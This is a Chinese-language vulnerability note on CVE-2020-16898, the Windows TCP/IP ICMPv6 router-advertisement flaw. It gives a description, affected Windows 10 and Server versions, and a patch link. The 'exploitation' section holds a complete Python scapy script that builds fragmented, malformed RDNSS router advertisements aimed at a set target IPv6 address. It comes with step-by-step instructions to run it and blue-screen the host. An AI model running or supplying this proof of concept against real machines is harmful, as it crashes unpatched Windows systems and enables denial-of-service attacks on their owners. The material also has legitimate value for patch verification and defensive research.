CVE-2020-16898
描述
CVE-2020-16898被称为“坏邻居”漏洞。Windows TCP/IP协议栈在处理 ICMPv6 路由广告包时,存在此远程代码执行漏洞。由于使用选项类型25和偶数长度字段对ICMPv6路由器播发数据包的处理不当,导致存在此漏洞。攻击者可通过向受影响主机发送特制ICMPv6路由广告包来利用此漏洞,成功利用此漏洞的攻击者可在目标服务器或客户端上执行任意代码。
影响版本
Product | Version | Update | Edition | Tested |
---|---|---|---|---|
Windows 10 | X86/x64/ARM64 | 1709 | :heavy_check_mark: | |
Windows 10 | X86/x64/ARM64 | 1803 | ||
Windows 10 | X86/x64/ARM64 | 1809 | ||
Windows 10 | X86/x64/ARM64 | 1903 | ||
Windows 10 | X86/x64/ARM64 | 1909 | ||
Windows 10 | X86/x64/ARM64 | 2004 | ||
Windows Server 2019 | ||||
Windows Server 2019 (Server Core installation) | ||||
Windows Server, version 1903 (Server Core installation) | ||||
Windows Server, version 1909 (Server Core installation) | ||||
Windows Server, version 2004 (Server Core installation) |
修复补丁
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898
利用方式
目前只空开蓝屏POC,充其量就算个CVE-2020-16899,利用前需要在虚拟机中开启IPV6,如图所示
接着把脚本中的IPV6地址修改下
from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6
v6_dst = "fd15:4ba5:5a2b:1008:7d57:7c30:726:1e6f"
v6_src = "fe80::7d57:7c30:726:1e6f%4"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA()
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
aaa = ICMPv6NDOptRDNSS()
aaa.len = 8
pkt = ICMPv6ND_RA() / aaa / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
最后使用命令pip install scapy
,安装依赖包,接着直接利用即可蓝屏
脚本来源
- 蓝屏脚本:momika233